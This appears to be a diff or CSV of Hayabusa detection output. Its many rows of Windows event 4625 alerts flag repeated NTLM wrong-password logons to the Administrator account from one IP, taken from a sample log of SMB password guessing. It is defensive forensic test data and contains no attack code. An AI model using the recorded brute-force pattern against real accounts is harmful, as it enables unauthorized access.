+2016-09-20 01:52:04.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N0HCToTmh3ESGBYt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.455 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nNvBueVo3ANNmSSN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mVWOoAG5ermGL2Gl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W7QYJUNPm5b4jprh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.590 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PHllwNJvpH3P97cp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.632 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tfT8GtafHGYMlkMf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nab7wtZfBVkcynsa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VHiijj7sT9nyqxii | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.780 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v06kkhqYNOyEHx2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.820 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WSTDX16YK5Zgkjxo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u6QWEyTrpndCagP0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.914 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7iCaXa5SR5IHJnQA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DNZhcPd1JaNFZMYG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LeOIg10KS60QplWz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.036 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: um3Nwo2doDbKJJvz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.150 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JuoqbUwc2Nth1xlH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.199 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WF8zKIbeboTLLkC6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kSyKc8igfuYLMekV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LHog0TdOci9CCKBa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R5ilFaQlemZUSNun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JOJnv9vFdqr2VSQC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rXaoVN7FvJ5rRDUF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.482 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kaFCT5QYFfmJpEC1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kOdVfL4XUTLp60tC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wFQSXjz0JTlkwpBu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.634 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sgAVlnENp6IzRRDr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JLkeKKFVP5vJjPtl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.751 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EqLXdGmr45vGpu3E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m7uTpMLqPgenJdRb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FQn7NqRzpGtjQdfv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8F8EZLHQtEWkeob1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5joxW81M9vcAfbJw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iMfmQF3xsaV5SQVZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.040 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQe9VL8eeco0SdPW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MnMbxQEuczrnMLKc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.137 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3DWOiTIp6JQLq9Vz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E1ORteg467kiFxmD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.216 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EoVhHZ2lkyAEx0w9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IMSqYaVVGR5v3bXr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.298 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hEEJ05nL0lyatWKL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.349 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SgrcS1NqwVJSEv31 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.395 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CCNTu1A6c6myngXd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.434 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YLx5Hv5GmdvsO9SE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VtS3KUkTVoAWGqbW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.512 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7DxfDEwc6ykrmddu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.552 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m8yKyocZwOY574pe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JfdmcsxnDHRxJYAA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.649 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: euxBOcdse8NjSzTd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dw7RZh5jKuRcM1xw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.742 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zIyozsYA1Mn27gl7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.786 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vhJopROjHZi6T8aF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.822 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QZ6XuZO6fIMg52tV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.870 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tvAYEepvDwz93ezW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.919 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Er95vLjet49OmSQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.960 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OKkMGZ5on5L26cip | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dp5dq3YYmmLxperL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: klkWqfYoNQQHRISX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q0EekPO3q6qRfq3i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gfG1x6sL4Aqlj7TK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: owSUehMmDEhijkfl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.224 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J3xBPT5WiuvmPZHe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gIufEPz8FBVd5yKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Blruxd110NvZjof | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0VsPitzItsjU3Y59 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.460 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HEq6vk4nTe3weSOP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.507 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lE8kvmcQtCmlsqtT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.548 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXmfjxrGC3liZ2oh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.589 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 72JLcUBrhOoXPLzD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.635 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sRoFpK2ZvBYy4jGM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.676 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9KReiI3k2WIKpxFq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.722 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wsfSzPbji6ARhU0k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: axeCxygvJ4zL4Xoq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.809 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y64sc51Y7vbiFTIQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.853 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o395tRQcfRBTTCSF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
